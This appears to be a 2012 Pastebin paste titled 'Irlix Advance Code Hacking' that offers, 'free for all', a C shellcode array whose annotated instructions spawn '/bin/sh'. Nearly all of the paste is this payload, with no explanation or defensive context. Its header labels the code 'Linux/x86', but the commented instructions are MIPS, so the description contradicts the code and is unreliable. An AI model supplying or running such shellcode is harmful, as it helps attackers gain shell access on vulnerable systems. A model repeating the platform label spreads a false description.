emS-St1ks

Irlix Advance Code Hacking

Jun 15th, 2012
82
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.06 KB | None | 0 0
  1. ---------------------------------------------------
  2. Very Advance Hacking Code Linux/x86 bin/sh
  3. free for all , new project
  4.  
  5. This is Irlix code !
  6. ----------------------------------------------------
  7.  
  8. char shellcode[]=
  9. "\x04\x10\xff\xff" /* bltzal $zero,<_shellcode> */
  10. "\x24\x02\x03\xf3" /* li $v0,1011 */
  11. "\x23\xff\x02\x14" /* addi $ra,$ra,532 */
  12. "\x23\xe4\xfe\x08" /* addi $a0,$ra,-504 */
  13. "\x23\xe5\xfe\x10" /* addi $a1,$ra,-496 */
  14. "\xaf\xe4\xfe\x10" /* sw $a0,-496($ra) */
  15. "\xaf\xe0\xfe\x14" /* sw $zero,-492($ra) */
  16. "\xa3\xe0\xfe\x0f" /* sb $zero,-497($ra) */
  17. "\x03\xff\xff\xcc" /* syscall */
  18. "/bin/sh"
  19. ;
Add Comment
Please, Sign In to add comment